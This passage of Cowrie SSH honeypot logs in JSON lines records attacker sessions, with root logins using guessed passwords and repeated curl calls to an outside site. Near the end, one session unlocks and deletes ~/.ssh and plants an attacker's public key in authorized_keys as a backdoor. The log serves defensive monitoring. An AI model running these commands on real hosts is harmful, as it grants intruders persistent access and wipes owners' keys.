6","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.281762Z","src_ip":"180.108.64.6","session":"b21a710ac6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.312362Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.313212Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.351337Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.352190Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.390942Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.391842Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.430779Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.431677Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.473054Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.473958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.511714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.512651Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.565532Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.566421Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.606318Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.607313Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.657054Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.657904Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.718618Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.719769Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.773011Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.773858Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.817705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.818595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.871058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.872000Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.911702Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.912615Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:21.952059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:21.952895Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.000508Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.001284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.052423Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.053185Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.092142Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.093002Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.131826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.132710Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.170061Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.170927Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.211218Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.212001Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.328824Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.329608Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.340161Z","src_ip":"180.108.64.6","session":"b21a710ac6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.377564Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.378510Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.418571Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.419460Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.507454Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.508312Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.533090Z","src_ip":"180.108.64.6","session":"7cbbd393f722"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.534015Z","src_ip":"180.108.64.6","session":"b21a710ac6e5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.545768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.546746Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.583653Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.584563Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.622280Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.623088Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.659807Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.660631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.698097Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.698815Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.736491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.737378Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.774887Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.775709Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.889394Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.890210Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.930298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.931058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:22.973485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:22.974246Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.233649Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.234545Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.315776Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.316741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.366184Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.367062Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.405826Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.406750Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.452342Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.453823Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.501338Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.502223Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.551606Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.552440Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.598248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.599471Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.638803Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.639625Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.680488Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.681258Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.725145Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.726315Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.771150Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.771987Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.834060Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.834813Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:47:23.876330Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:47:23.877687Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.closed","duration":"120.6","message":"Connection lost after 120.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:47:24.091929Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"101.44.186.66","src_port":42400,"dst_ip":"1.2.3.4","dst_port":22,"session":"9597d0856ce8","protocol":"ssh","message":"New connection: 101.44.186.66:42400 (1.2.3.4:22) [session: 9597d0856ce8]","sensor":"my-vps","timestamp":"2025-08-28T07:48:26.619687Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T07:48:26.620974Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T07:48:26.784648Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.login.success","username":"root","password":"xxoo","message":"login attempt [root/xxoo] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:48:27.479973Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:48:27.827310Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:48:27.828404Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T07:48:27.829769Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:48:27.994608Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:48:28.384661Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T07:48:28.385517Z","src_ip":"101.44.186.66","session":"9597d0856ce8"}
